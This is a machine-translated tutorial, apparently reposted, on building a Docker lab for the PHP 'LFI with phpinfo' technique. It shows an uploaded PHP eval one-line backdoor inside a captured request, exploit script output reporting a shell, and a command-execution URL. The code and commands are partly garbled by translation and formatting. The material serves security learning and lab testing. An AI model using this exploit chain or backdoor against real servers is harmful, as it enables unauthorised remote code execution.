PHP local file contains vulnerability environment construction and utilization

Source: Internet
Author: User
Tags phpinfo docker hub docker run

About 0x00

PHP local file contains knowledge of the vulnerability, dark clouds early on the corresponding article, Lfi with Phpinfo first by foreign Daniel, can refer to the following two articles. The use of the principle is to use the PHP post upload file to generate temporary files, phpinfo () read the temporary file path and name, the local containing the vulnerability generated 1 words back door.

This method is successful in local testing, in order to facilitate learning, reduce learning costs, has built Docker environment, easy to test. Put the built Docker on a foreign VPS and use the scripts under the POC folder in the GitHub project Lfi_phpinfo to run locally and still be getshell. This approach is feasible, and the network requirements are not very high.

    • Docker Hub Mirror Address: Janes/lfi_phpinfo

    • GitHub Project Address: Lfi_phpinfo

Source code directory, you can use the Docker reproduction, the POC directory to store the use of scripts

Paper

Http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf

Http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

0x01 PHP Upload

When uploading a file to any PHP file on the server, a temporary file will be generated and the path and name of the temporary file can be found directly on the Phpinfo page.

    • Post Upload file

PHP post way to upload arbitrary files, the server will create temporary files to save the contents of the file.

In order to facilitate file transfer in the HTTP protocol, a form-based HTML file transfer method is provided.

To ensure that the properties of the upload form are enctype= "multipart/form-data, you must use post see: PHP File-upload.post-method

The PHP engine handles the enctype= "Multipart/form-data" request as follows:

    1. Request arrival
    2. Create a temporary file and write the contents of the uploaded file
    3. Call the appropriate PHP script for processing, such as verifying name, size, etc.
    4. Delete temporary files

The PHP engine first saves the contents of the file to a temporary file and then makes the appropriate action. The name of the temporary file is php+ random character.

    • $_files information, including temporary file path, name

In PHP, there is a hyper global variable $_files, which holds information about the uploaded file, including file name, type, temporary file name, error code, size

0x02 Manual Test Phpinfo () Get temporary file path

    • HTML form

File upload.html

#!html    
  • Browser access upload.html, upload files file.txt

    #!php
      
        
  • Burp View post information as follows

    #!bashpost/lfi_phpinfo/phpinfo.php http/1.1host: 127.0.0.1user-agent:mozilla/5.0 (X11; Linux x86_64; rv:44.0) gecko/20100101 firefox/44.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:en-us,en;q=0.5accept-encoding:gzip, deflatereferer:http://127.0.0.1/lfi_phpinfo/ Upload.htmlconnection:closecontent-type:multipart/form-data; boundary=---------------------------11008921013555437861019615112content-length:368--------------------------- --11008921013555437861019615112content-disposition:form-data; Name= "File"; Filename= "file.txt" Content-type:text/plain!--? phpeval ($_request["cmd"]),?-->----------------------------- 11008921013555437861019615112content-disposition:form-data; Name= "Submit" Submit-----------------------------11008921013555437861019615112--
  • Browser access, PHPINFO returns the following information:

    #!php_request["Submit"]      submit_post["Submit"]     submit_files["file"      Array    (        [Name] = File.txt        [Type] = Text/plain        [Tmp_name] =/tmp/phpufdchh        [ERROR] = 0        [Size] = +    )

Get Tmp_name Path

0x03 python script upload file

#!pythonimport requestshost = ' 127.0.0.1 ' url = ' http://{ip}/lfi_phpinfo/phpinfo.php '. Format (ip=host) File_ = '/var/www /lfi_phpinfo/file.txt ' response = requests.post (URL, files={"name": Open (File_, ' RB ')}) print (Response.text)
    • Partial return result

      #!php_files["Name"]
      Array (    [name] = File.txt    [Type] =     [Tmp_name] =/tmp/php7evbv3    [ERROR] = 0    [ Size] = 33)

0X04 Local Build environment

    • Get shell

      #!bash$ python lfi_phpinfo.py 127.0.0.1LFI with phpinfo () ==============================info:__main__:getting Initial Offset ... info:__main__:found [tmp_name] at 67801info:__main__:got it! Shell created in/tmp/ginfo:__main__:wowo! \m/info:__main__:shutting down ...
    • Firefox access

      #!bashhttp://127.0.0.1/lfi_phpinfo/lfi.php?load=/tmp/gc&f=iduid=33 (Www-data) gid=33 (www-data) groups=33 ( Www-data)

Explain the success of Getshell, then you can freely play ~ ~

0x05 using Docker to build your environment

The basic use of Docker, here is not elaborated, can be self-Google. Here are two ways to build a mirrored source, build it yourself using GitHub lfi_phpinfo dockerfile, or use the image I've built Janes/lfi_phpinfo

    • Mirror Source

--[PHP 1 = "Official source" 2= "2=" 2= "2=" 2= "language=": 5.6-apache "" "" "\"][/php]/php 5

Or

--Janes/lfi_phpinfo

    • Build environment Run tests

Get the GitHub lfi_phpinfo source code, switch to the Web directory, and start building the environment for testing. This provides three ways to run

    1. Mode 1 run the test using PHP official source

      #!bashdocker run--rm-v code/:/var/www/html-p 80:80 Php:5.6-apache
    2. Mode 2 run the test using the built-in image Janes/lfi_phpinfo

      #!bashdocker Pull "Janes/lfi_phpinfo" Docker run--rm-p "80:80" Janes/lfi_phpinfo
    3. Mode 3 using Docker-compose

      #!bash  docker-compose up

You can then use the Python script to Getshell the

#!bashpython lfi_phpinfo.py Docker_host_ip

0x06 concluding remarks

Hands-on practice LFI with phpinfo use of the process, in fact, it is not as smooth as the passage of the article, the period of more or less encounter some environment-related problems, and solve these problems will be spent energy, this is the birth of me with Docker to build the test environment of the idea of the source, Hope to give cyber-security enthusiasts to provide a more convenient learning environment. Finally thanks to the author of the [LFI with phpinfo Local test process] article, I studied LFI with Phpinfo for a lot of help.

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.